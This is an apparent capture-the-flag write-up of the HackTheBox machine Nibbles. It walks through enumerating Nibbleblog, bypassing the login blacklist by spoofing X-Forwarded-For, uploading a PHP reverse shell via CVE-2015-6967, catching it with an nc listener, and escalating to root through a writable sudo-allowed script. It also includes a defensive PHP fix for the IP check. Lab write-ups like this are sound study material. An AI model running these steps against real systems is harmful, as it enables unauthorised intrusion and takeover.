Machine started with IP 10.129.6.88.

Enumeration

$ nmap -sSV -p- -oA 1_nmap 10.129.6.88
Starting Nmap 7.95 ( https://nmap.org ) at 2026-05-29 21:51 EDT
Nmap scan report for 10.129.6.88
Host is up (0.040s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

  • Port 80 - web server - Nibbleblog on Apache 2.4.18
    • source code of website shows a comment <!--/nibbleblog/ directory-->
    • /nibbleblog is a blog with no posts
    • the browser's network tab shows other files being pulled from /themes, /content and /admin. Directory browsing is on for all of them
      • /themes/ - several themes show version supported 4.0 / 4.0.1
      • this version is susceptible to CVE-2015-6967, arbitrary file upload including PHP files
      • "Unrestricted file upload vulnerability in the My Image plugin in Nibbleblog before 4.0.5 allows remote administrators to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in content/private/plugins/my_image/image.php"
      • nibbleblog/content/private/plugins/my_image/image.php 404 not found
      • CVE-2015-6967 shows admin.php?controller=plugins&action=config&plugin=my_image as the exploit path. This appears to work, but requires creds
    • Per the official GitHub, install.php is what configures the site and it saves the password to /content/private/shadow.php
      • attempting to visit /nibbleblog/install.php states it's already installed, as seen in line 32. The script exits, preventing further modification. However, it does point us to the /content/private/config.xml db file, which contains an [email protected] email.
      • /content/private/users.xml shows user username="admin"
      • attempting to visit the shadow.php returns a blank page
    • navigating to /nibbleblog/admin.php. I tried 5 user/pass combos before my IP was added to the blacklist in /users.xml for 5 minutes. The source code's get_user_ip(), which decides the address that gets blacklisted, is shown below.
public static function get_user_ip()
{
    if(getenv('HTTP_X_FORWARDED_FOR'))
        $ip = getenv('HTTP_X_FORWARDED_FOR');
    elseif(getenv('HTTP_CLIENT_IP'))
        $ip = getenv('HTTP_CLIENT_IP');
    else
        $ip = getenv('REMOTE_ADDR');

    if(filter_var($ip, FILTER_VALIDATE_IP))
        return $ip;

    return getenv('REMOTE_ADDR');
}
    • We could programmatically spoof HTTP_X_FORWARDED_FOR while brute forcing, since that header is consulted before REMOTE_ADDR.
  • Port 22 - ssh - OpenSSH 7.2p2
    • This version appears to be vulnerable to CVE-2016-6210 for username enumeration. This means we can provide a list of usernames and, based on response timing, determine whether each username exists.
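The fix a defender would want for the get_user_ip() shown above, as an added PHP example (not Nibbleblog's own code): honour X-Forwarded-For only when the TCP peer is a known reverse proxy, so the brute-force blacklist keys on an address the client cannot choose. The proxy list and the two sample requests are constructed assumptions.

```php
<?php
// Hardened variant of Nibbleblog's get_user_ip() (added example, not project code).
// The original trusts HTTP_X_FORWARDED_FOR from any client, so the 5-minute blacklist
// keys on an attacker-chosen value. Here the header is only consulted when REMOTE_ADDR
// (the socket peer, which cannot be forged) belongs to a configured reverse proxy.

// Assumption: addresses of reverse proxies in front of the blog. Empty => never trust headers.
const TRUSTED_PROXIES = ['127.0.0.1', '10.0.0.5'];

function get_user_ip_hardened(array $server, array $trusted_proxies = TRUSTED_PROXIES): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';

    // Direct connection, or a connection from an unknown host: the peer is the only
    // trustworthy value, so any X-Forwarded-For the client sent is ignored.
    if (!in_array($remote, $trusted_proxies, true)) {
        return $remote;
    }

    // Behind a trusted proxy the header reads "client, proxy1, proxy2, ...".
    // Walk it from the right, skipping hops we trust; the first untrusted hop is the client.
    $chain = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR'] ?? ''));
    for ($i = count($chain) - 1; $i >= 0; $i--) {
        $hop = $chain[$i];
        if (filter_var($hop, FILTER_VALIDATE_IP) === false) {
            break; // malformed or empty entry: stop and fall back to the peer address
        }
        if (!in_array($hop, $trusted_proxies, true)) {
            return $hop;
        }
    }
    return $remote;
}

// Constructed requests: a direct client that sets the header itself (the Intruder scenario),
// and a genuine client whose request passed through the trusted proxies.
$spoofed = ['REMOTE_ADDR' => '10.10.14.7', 'HTTP_X_FORWARDED_FOR' => '203.0.113.9'];
$proxied = ['REMOTE_ADDR' => '127.0.0.1', 'HTTP_X_FORWARDED_FOR' => '198.51.100.4, 10.0.0.5'];

echo "spoofed request is keyed on: ", get_user_ip_hardened($spoofed), "\n";
echo "proxied request is keyed on: ", get_user_ip_hardened($proxied), "\n";
```

With this change the blacklist counter for the spoofed request tracks the real peer, so rotating the header no longer resets it.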

Exploitation

  • port 80, /nibbleblog/admin.php accepts credentials. admin is the username, password unknown. Has a blacklist feature keyed on IP that will block requests for 5 minutes if brute forcing is detected. It checks the HTTP_X_FORWARDED_FOR header first for the IP, and that header can be spoofed.
  • I attempted with Burp Suite's Intruder to configure a number payload to increment X-Forwarded-For alongside a second payload using a wordlist for the password. It did succeed without hitting a lockout; however, the solution was even simpler. I took a guess and got lucky by using nibbles.
  • Navigating back to /nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image, uploaded the php-reverse-shell. It is placed under /nibbleblog/content/private/plugins/my_image/image.php
  • started a listener with nc -lvnp 4444 and browsed to image.php, which connected the reverse shell

Post-Exploitation

  • reverse shell runs as nibbler with working directory /
  • user.txt found under /home/nibbler/user.txt
  • upgrade the dumb shell to a full tty
# after the nc listener has hooked, spawn a pseudo-terminal
python3 -c 'import pty; pty.spawn("/bin/bash")'
# CTRL + Z to background the reverse shell
echo $TERM                  # note the result, e.g. xterm-256color   (#1)
stty -a                     # note the rows and columns               (#2)
stty raw -echo; fg          # enter raw mode (which will glitch the ui) and foreground the shell
export TERM=xterm-256color  # use the same terminal type as the $TERM output from #1
stty rows 36 columns 161    # use the rows and columns from #2

Priv-esc

  • sudo -l returns (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
  • this dir/script does not exist, so we should be able to create it and sudo it to gain root
cd ~
mkdir personal && cd personal
mkdir stuff && cd stuff
echo "exec bash" > monitor.sh
chmod +x monitor.sh
sudo ./monitor.sh

root

  • root granted
  • flag found under /root/root.txt

Conclusion

Pretty good box! The enumeration phase took me the longest, especially trying to figure out how to get into the admin portal. From there, exploitation and priv esc were super easy. Nice first machine back on HackTheBox!